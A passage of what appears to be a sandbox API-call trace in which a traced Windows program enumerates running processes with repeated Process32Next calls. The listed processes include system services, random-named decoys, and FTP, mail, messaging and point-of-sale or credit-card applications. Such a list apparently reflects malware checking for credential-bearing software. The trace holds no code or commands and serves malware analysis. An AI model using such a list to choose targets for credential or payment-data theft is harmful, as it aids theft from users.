lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0233.301] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0233.303] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.304] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0233.306] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0233.307] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0233.312] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0233.314] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0233.315] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.317] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.318] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0233.320] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.321] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.323] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.456] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.458] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.459] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.461] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.462] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.464] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0233.468] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0233.470] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.471] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.473] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0233.474] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0233.476] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0233.477] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.479] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0233.481] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0233.485] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.486] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0233.488] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0233.489] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0233.491] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0233.492] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0233.494] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0233.496] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0233.668] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0233.670] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0233.671] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0233.673] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0233.674] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0233.676] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0233.677] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0233.679] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0233.680] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0233.682] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0233.683] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0233.686] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0233.688] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0233.689] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0233.691] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0233.692] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0233.694] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0233.695] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0233.696] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0233.698] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0233.904] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0233.906] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0233.908] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0233.909] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0233.911] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0233.913] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0233.915] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0233.916] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0233.918] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0233.921] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0233.923] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0233.924] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0233.926] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0233.928] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0233.929] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0233.931] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0233.933] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0233.937] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0233.938] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0233.940] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0233.941] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0233.943] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0233.945] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0233.946] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0233.948] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0234.119] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0234.122] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 